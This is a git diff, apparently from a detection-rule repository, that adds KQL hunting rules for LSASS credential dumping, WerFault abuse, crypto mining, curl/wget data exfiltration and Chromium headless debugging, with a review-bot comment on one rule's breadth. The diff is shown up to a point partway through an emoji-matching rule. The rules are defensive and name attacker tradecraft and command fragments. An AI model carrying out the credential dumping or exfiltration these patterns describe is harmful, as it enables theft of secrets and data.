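Review bot: The `| where` line of potential_credential_dumping_attempt_using_new_networkprovider_cli.kql matches any command line that contains both path fragments, so read-only enumeration of that key (a `reg query` or a PowerShell `Get-ItemProperty` against a service's NetworkProvider subkey) fires the same "high" level alert as the write the description talks about. If that breadth is intended, the False Positives block should say so, e.g. `// - Read-only queries of the NetworkProvider key by inventory or audit scripts also match`; if not, constraining the rule to the write verbs the rule author has in mind would cut triage noise. The first False Positives bullet also has a typo (`filtred`) that the converter copies through from the upstream description.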
@@ -0,0 +1,10 @@
+// Title: Potential Credential Dumping Via LSASS Process Clone
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2021-11-27
+// Level: critical
+// Description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.001
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Windows\\System32\\lsass.exe" and InitiatingProcessFolderPath endswith "\\Windows\\System32\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
new file mode 100644
index 00000000..a5860a75
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Via WER
+// Author: @pbssubhash , Nasreddine Bencherchali
+// Date: 2022-12-08
+// Level: high
+// Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " -u -p " and ProcessCommandLine contains " -ip " and ProcessCommandLine contains " -s ") and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and (FolderPath endswith "\\Werfault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
new file mode 100644
index 00000000..96f5fa0f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Crypto Mining Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-10-26
+// Level: high
+// Description: Detects command line parameters or strings often used by crypto miners
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1496
+// False Positives:
+// - Legitimate use of crypto miners
+// - Some build frameworks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL") and (not((ProcessCommandLine contains " pool.c " or ProcessCommandLine contains " pool.o " or ProcessCommandLine contains "gcc -")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
new file mode 100644
index 00000000..e61428b7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Activity Via CommandLine Tools
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects the use of various CLI utilities exfiltrating data via web requests
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and 
ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
new file mode 100644
index 00000000..5da0b829
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Potential Data Stealing Via Chromium Headless Debugging
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: high
+// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
new file mode 100644
index 00000000..79e8d350
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
@@ -0,0 +1,10 @@ +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or ProcessCommandLine 
contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or 
ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or 
ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" 
or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains 
"🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or 
ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or 
ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or 
ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" 
or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains "👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or 
ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or 